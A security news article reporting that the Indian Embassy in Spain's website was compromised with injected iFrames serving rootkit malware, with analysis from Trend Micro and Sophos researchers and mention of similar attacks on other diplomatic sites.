The Embassy of India in Spain Pushes Malware via Website

The website of the Embajada de la India en España has been compromised by attackers who injected malware serving code into its pages, warn security researchers. The malicious application served contains a rootkit component, which attaches itself to the svchost.exe process.

Initially reported by Ismael Valenzuela and further dissected by independent security consultant Dancho Danchev, the attack on the website of the Indian Embassy in Spain involves a rogue iFramee, which pushes the malicious binary to visitors when loaded.

“Interestingly, the malicious attackers centralized the campaign by parking the three iFrames at the same IP,” notes Mr. Danchev, who also points out that many domains hosted on the same IP have been involved in iFrame attacks since August 2008 and are registered to the same person.

Security researchers from antivirus vendor Trend Micro have also analyzed the attack and arrived to the conclusion that indeed it might be part of a larger-scale iFrame injection campaign. They also found rogue code inserted into the header of the embassy's website, code that is consistent with previously documented incidents.

The additional rogue code points to other pages, which display various pharmaceutical information, leading Trend Micro Advanced Threats Analyst Ryan Flores to conclude that the attackers also employ black search engine optimization techniques. “This is possibly an SEO poisoning scheme, or a plot to use the legitimate domains of the compromised websites to evade spam filters,” noted Flores.

Paul O Baccas, malware analyst at Sophos, also confirmed the attack and noted that the websites of other diplomatic missions had been compromised in the past. These include the U.S. Consulate in St. Petersburg, the French Embassy in Lybia, the Syrian Embassy in London, the Dutch Embassy in Moscow or the Embassy of Brazil in India.

Another Trend Micro researcher, Edgardo Diaz, Jr., notes that parts of this attack are not yet active, possibly pointing to an ongoing advertising scam that has not been fully deployed yet. However, he warns that it would only take a few modifications on the hackers' part in order to turn this into a very serious threat.

The malware distributed via the compromised embassy website is detected as BKDR_TDSS.CG by TrendMicro and Mal/IFrame-F by Sophos.